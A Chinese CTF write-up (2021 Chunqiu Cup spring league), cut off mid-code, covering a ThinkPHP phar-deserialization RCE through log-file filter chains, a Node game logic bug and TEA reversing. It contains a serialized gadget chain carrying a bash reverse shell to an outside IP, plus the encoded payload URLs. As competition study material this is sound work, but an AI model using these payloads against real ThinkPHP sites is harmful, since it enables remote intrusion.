2021年春秋杯春季联赛部分WriteUp

  • A+
所属分类:CTF专场

Web

easy_filter

跟国赛那个题很像,就是log文件的格式不大一样,改一改就好

用的RCEpayload:

https://www.freebuf.com/vuls/269882.html

生成phar:

<?php

$a = unserialize(urldecode("O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A34%3A%22%00think%5Cprocess%5Cpipes%5CWindows%00files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A4%3A%7Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A54%3A%22bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F47.104.134.135%2F2333+0%3E%261%27%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A9%3A%22%00%2A%00append%22%3Ba%3A1%3A%7Bs%3A6%3A%224ut15m%22%3Ba%3A0%3A%7B%7D%7Ds%3A8%3A%22relation%22%3Bb%3A0%3B%7D%7D%7D"));

$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt""test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

对phar进行编码

2021年春秋杯春季联赛部分WriteUp
image-20210529150140989

注意这里生成的payload每行结尾有多余的换行符和=,去除一下,然后把+编码成%2b

P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00

thinkphp的日志文件在runtime/log/202105/29.log,下一步就是在本地调试下,尝试如何去掉多余的字符,只将我们的payload解码成phar文件

先清空日志:

index.php?s=/index/Index/hello&file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log
2021年春秋杯春季联赛部分WriteUp
image-20210529151629284

为了防止多余的等号影响payload的解析,我们这样传参index.php/index/Index/hello?file=

写入我们刚才生成的payload

index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
2021年春秋杯春季联赛部分WriteUp
image-20210529151654248

生成了如下格式的日志:

---------------------------------------------------------------

[2021-05-29T15:16:44+08:00] 127.0.0.1 GET 127.0.0.1/index.php/index/Index/hello?file=P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00
[ error ] [2]file_get_contents(P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00+=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00K=00P=00o=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00A=00D=00n=00j=00D=00c=00f=00a=00/=00o=00V=00n=00K=00P=00s=00m=00j=00S=00D=00S=00L=00M=00E=00K=00V=00c=00J=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00): failed to open stream: File name too long

经过尝试,将payload修改成如下格式即可正常解码:

payload开头加入俩数字来使得前面的=正常解码,结尾加上a使得最终只出现一个payload

50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00c=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00m=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00M=00j=00o=00i=00a=00W=00Q=00i=00O=003=001=00z=00O=00j=00I=00x=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00T=00W=009=00k=00Z=00W=00w=00A=00d=002=00l=000=00a=00E=00F=000=00d=00H=00I=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00N=00j=00o=00i=00c=003=00l=00z=00d=00G=00V=00t=00I=00j=00t=009=00c=00z=00o=005=00O=00i=00I=00A=00K=00g=00B=00h=00c=00H=00B=00l=00b=00m=00Q=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=002=00E=006=00M=00D=00p=007=00f=00X=001=00z=00O=00j=00g=006=00I=00n=00J=00l=00b=00G=00F=000=00a=00W=009=00u=00I=00j=00t=00i=00O=00j=00A=007=00f=00X=001=009=00C=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00u=00d=00H=00h=000=00B=00A=00A=00A=00A=00P=00n=00U=00s=00W=00A=00E=00A=00A=00A=00A=00D=00H=005=00/=002=00L=00Y=00B=00A=00A=00A=00A=00A=00A=00A=00A=00d=00G=00V=00z=00d=00C=00X=00V=00Z=00K=00W=00D=00l=00R=00w=00s=00R=00A=00g=003=00p=001=001=008=00O=00N=00k=002=00U=00P=00O=00w=00A=00g=00A=00A=00A=00E=00d=00C=00T=00U=00I=00=3D=00a

再清空,发送payload

2021年春秋杯春季联赛部分WriteUp
image-20210529151459137
2021年春秋杯春季联赛部分WriteUp
image-20210529152400240

解码

index.php?s=/index/Index/hello&file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=/var/www/html/runtime/log/202105/29.log
2021年春秋杯春季联赛部分WriteUp
image-20210529152434435

触发

2021年春秋杯春季联赛部分WriteUp
image-20210529152509697

成功执行,接下来就把命令改成tac /flag就好了

http://eci-2zegz186wmvgj36lmnge.cloudeci1.ichunqiu.com/index.php/index/Index/hello?file=50P=00D=009=00w=00a=00H=00A=00g=00X=001=009=00I=00Q=00U=00x=00U=00X=000=00N=00P=00T=00V=00B=00J=00T=00E=00V=00S=00K=00C=00k=007=00I=00D=008=00%2b=00D=00Q=00p=00j=00A=00Q=00A=00A=00A=00Q=00A=00A=00A=00B=00E=00A=00A=00A=00A=00B=00A=00A=00A=00A=00A=00A=00A=00t=00A=00Q=00A=00A=00T=00z=00o=00y=00N=00z=00o=00i=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00I=00j=00o=00x=00O=00n=00t=00z=00O=00j=00M=000=00O=00i=00I=00A=00d=00G=00h=00p=00b=00m=00t=00c=00c=00H=00J=00v=00Y=002=00V=00z=00c=001=00x=00w=00a=00X=00B=00l=00c=001=00x=00X=00a=00W=005=00k=00b=003=00d=00z=00A=00G=00Z=00p=00b=00G=00V=00z=00I=00j=00t=00h=00O=00j=00E=006=00e=002=00k=006=00M=00D=00t=00P=00O=00j=00E=003=00O=00i=00J=000=00a=00G=00l=00u=00a=001=00x=00t=00b=002=00R=00l=00b=00F=00x=00Q=00a=00X=00Z=00v=00d=00C=00I=006=00N=00D=00p=007=00c=00z=00o=00x=00N=00z=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00G=00R=00h=00d=00G=00E=00i=00O=002=00E=006=00M=00T=00p=007=00c=00z=00o=002=00O=00i=00I=000=00d=00X=00Q=00x=00N=00W=000=00i=00O=003=00M=006=00O=00T=00o=00i=00d=00G=00F=00j=00I=00C=009=00m=00b=00G=00F=00n=00I=00j=00t=009=00c=00z=00o=00y=00M=00T=00o=00i=00A=00H=00R=00o=00a=00W=005=00r=00X=00E=001=00v=00Z=00G=00V=00s=00A=00H=00d=00p=00d=00G=00h=00B=00d=00H=00R=00y=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00z=00O=00j=00Y=006=00I=00n=00N=005=00c=003=00R=00l=00b=00S=00I=007=00f=00X=00M=006=00O=00T=00o=00i=00A=00C=00o=00A=00Y=00X=00B=00w=00Z=00W=005=00k=00I=00j=00t=00h=00O=00j=00E=006=00e=003=00M=006=00N=00j=00o=00i=00N=00H=00V=000=00M=00T=00V=00t=00I=00j=00t=00h=00O=00j=00A=006=00e=003=001=009=00c=00z=00o=004=00O=00i=00J=00y=00Z=00W=00x=00h=00d=00G=00l=00v=00b=00i=00I=007=00Y=00j=00o=00w=00O=003=001=009=00f=00Q=00g=00A=00A=00A=00B=000=00Z=00X=00N=000=00L=00n=00R=004=00d=00A=00Q=00A=00A=00A=00B=009=007=00L=00F=00g=00B=00A=00A=00A=00A=00A=00x=00%2b=00f=009=00i=002=00A=00Q=00A=00A=00A=00A=00A=00A=00A=00H=00R=00l=00c=003=00Q=00p=006=00T=00n=00c=00B=00R=00c=007=00o=00Z=00V=00i=00m=00m=005=00n=00c=00l=00W=00t=00J=00y=00W=00w=007=00Q=00I=00A=00A=00A=00B=00H=00Q=00k=001=00C=00a
2021年春秋杯春季联赛部分WriteUp
image-20210529153357667

也可以弹shell

2021年春秋杯春季联赛部分WriteUp
image-20210529175348399

ctftaker

/source有源码

import { createHash } from "crypto";
import { readFileSync } from "fs";
import { resolve } from "path";
import {exit} from "process";

import cookieSession  from "cookie-session";
import express from "express";
import { SessionData } from "express-session";

import * as CONST from "./const";

declare module "express-session" {
  interface SessionData {
    history: string[];
    monster: SerializedObj[];
    player: SerializedObj;
    coin: number;
    init: boolean;
  }
}

interface SerializedObj {
  ATK: number;
  DEF: number;
  HP: number;
  factor: number;
  name: string;
}

class Obj {
  ATK: number;
  DEF: number;
  HP: number;
  factor: number;
  constructor(readonly name: string, factor: number|string, ATK?: number, DEF?: number, HP?: number) {
    this.factor = factor = parseInt(`${factor}`);
    this.ATK = ATK ?? factor * Math.random();
    this.DEF = DEF ?? factor * Math.random();
    this.HP = HP ?? factor * Math.random();
  }
  levepup(factor: number|string) {
    this.factor = factor = this.factor + parseInt(`${factor}`);
    this.ATK = factor * Math.random();
    this.DEF = factor * Math.random();
    this.HP = factor * Math.random();
  }
  fight(obj: Obj): [boolean, string[]] {
    const his: string[] = [`${this.name}${obj.name}发起了对战!`];
    let selfHp = this.HP;
    let objHp = obj.HP;
    his.push(`${this.name} HP:${selfHp}${obj.name} HP:${objHp}`);
    while(true) {
      objHp -= this.ATK - obj.DEF;
      objHp = Math.max(objHp, 0);
      his.push(`${this.name}${obj.name}发起攻击!`);
      his.push(`${this.name} HP:${selfHp}${obj.name} HP:${objHp}`);
      if(objHp === 0break;
      selfHp -= obj.ATK - this.DEF;
      selfHp = Math.max(selfHp, 0);
      his.push(`${obj.name}${this.name}发起攻击!`);
      his.push(`${this.name} HP:${selfHp}${obj.name} HP:${objHp}`);
      if(selfHp === 0break;
    }
    return [selfHp > 0, his];
  }
  static serialize(obj: Obj): SerializedObj {
    return {
      ATK: obj.ATK,
      DEF: obj.DEF,
      HP: obj.HP,
      factor: obj.factor,
      name: obj.name,
    };
  }
  static deserialzie(obj: SerializedObj): Obj {
    return new Obj(obj.name, obj.factor, obj.ATK, obj.DEF, obj.HP);
  }
}

const app = express();
app.use(express.static(resolve("static")));
app.use(express.json());
app.use(express.urlencoded({extendedtrue}));
const secret = createHash("md5").update(`${Math.random()}`).digest("hex");
app.use(cookieSession({
  secret: secret,
  name"session",
}));

console.log(secret);

function initSession(session: any): session is SessionData {
  if(!session.init) {
    session.history = [];
    session.player = new Obj("Player"0);
    session.coin = 1;
    session.init = true;
    session.monster = [
      Obj.serialize(new Obj("BabyCalc"1)),
      Obj.serialize(new Obj("MediumCalc"2)),
      Obj.serialize(new Obj("HardCalc"5)),
      Obj.serialize(new Obj("GodCalc"10)),
      Obj.serialize(new Obj("ImpossibleCalc"100)),
      Obj.serialize(new Obj("TotalImpossibleCalc"1000)),
      Obj.serialize(new Obj("????????Calc"10000)),
    ];
  }
  return true;
}

app.use((req, res, next) => {
  initSession(req.session);
  next();
});

app.get("/his", (req, res) => {
  if(!initSession(req.session)) return;
  res.send({
    message: req.session.history.join("n"),
  });
});

app.get("/start", (req, res) => {
  if(!initSession(req.session)) return;
  req.session.history = req.session.history.concat(CONST.banner);
  res.send({
    message: CONST.banner.join("n"),
  });
});

app.post("/levelup", (req, res) => {
  if(!initSession(req.session)) return;
  const {f} = req.body;
  if(!f || f > req.session.coin) {
    return res.send({message"不大对呢"});
  }
  req.session.coin -= f;
  const player = Obj.deserialzie(req.session.player);
  if(player.factor > 50) {
    return res.send({message"你太强了,寻找更多的机遇吧"});
  }
  player.levepup(f);
  req.session.player = Obj.serialize(player);
  const msg = `${player.name}使用了${f}枚硬币升级了自己
  现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`
.split("n");
  req.session.history = req.session.history.concat(msg);
  res.send({message: msg.join("n")});
});

app.get("/monster", (req, res) => {
  if(!initSession(req.session)) return;
  if(req.session.monster.length===0) {
    return res.send({message: CONST.footer.join("n")});
  }
  const monster = Obj.deserialzie(req.session.monster[0]);
  res.send({
    message`${monster.name}出现了!ATK:${monster.ATK},DEF:${monster.DEF},HP:${monster.HP}`,
  });
});

app.get("/status", (req, res) => {
  if(!initSession(req.session)) return;
  const player = Obj.deserialzie(req.session.player);
  res.send({message`${player.name}现在的状态:ATK:${player.ATK},DEF:${player.DEF},HP:${player.HP},COIN:${req.session.coin}枚,还剩${req.session.monster.length}个题`});
});

app.get("/fight", (req, res) => {
  if(!initSession(req.session)) return;
  if(req.session.monster.length===0) {
    return res.send({message: CONST.footer.join("n")});
  }
  const player = Obj.deserialzie(req.session.player);
  const monster = Obj.deserialzie(req.session.monster[0]);
  const [win, his] = player.fight(monster);
  if(win) {
    req.session.monster = req.session.monster.slice(1);
    his.push("你赢了耶!");
  } else {
    his.push("你输了,刷新以重新开始");
    req.session.init = false;
  }
  req.session.history = req.session.history.concat(his);
  res.send({message: his.join("n")});
});

app.get("/source", (req, res) => {
  res.send(readFileSync("./src/main.ts"));
});

app.get("/exit", (req, res) => {
  exit(0);
});

app.use((err: any, req: any, res: any) => {
  console.error(err.stack);
  res.status(500).send("Something broke!");
});

app.listen(80);

重要的地方在这里

2021年春秋杯春季联赛部分WriteUp
image-20210529161549436
2021年春秋杯春季联赛部分WriteUp
image-20210529161603354

传入9999999/0,即可把自己的倍数增加到9999999,然后序列化保存

2021年春秋杯春季联赛部分WriteUp
image-20210529161816131

下次反序列化player的时候,player的属性就会超级加倍

2021年春秋杯春季联赛部分WriteUp
image-20210529161823449

一开始是个弱鸡

2021年春秋杯春季联赛部分WriteUp
image-20210529161921628

属性加倍

2021年春秋杯春季联赛部分WriteUp
image-20210529161943872

打出flag

2021年春秋杯春季联赛部分WriteUp
image-20210529162001119

Reverse

backdoor

首先程序会net listen监听端口

2021年春秋杯春季联赛部分WriteUp
image-20210529171048979

输入g01angBackd00r会执行 mai n_Decrypt函数

2021年春秋杯春季联赛部分WriteUp
image-20210529171102262
2021年春秋杯春季联赛部分WriteUp
image-20210529171135816

chal

直接打开文件

2021年春秋杯春季联赛部分WriteUp
image-20210529171318392

根据敏感变量名猜测是tea家族算法

提取出数据

3
3208527578,423585179
3.0
699878777,1677098023
3.4
1664154466,3464319808
3.8
3532878313,2922316096
3.12
2276156225,33987677
3.16
3775107838,3138262082


key 
3735928559,3405691582,269488144,16843009

exp

#include <stdio.h>
#include <stdint.h>
 
//加密函数
void encrypt (uint32_t* v, uint32_t* k) {
    uint32_t v0=v[0], v1=v[1], sum=0, i;           /* set up */
    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i < 32; i++) {                       /* basic cycle start */
        sum += delta;
        v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
    }                                              /* end cycle */
    v[0]=v0; v[1]=v1;
}
//解密函数
void decrypt (uint32_t* v, uint32_t* k) {
    uint32_t v0=v[0], v1=v[1], sum=0xC6EF3720, i;  /* set up */
    uint32_t delta=0x9e3779b9;                     /* a key schedule constant */
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   /* cache key */
    for (i=0; i<32; i++) {                         /* basic cycle start */
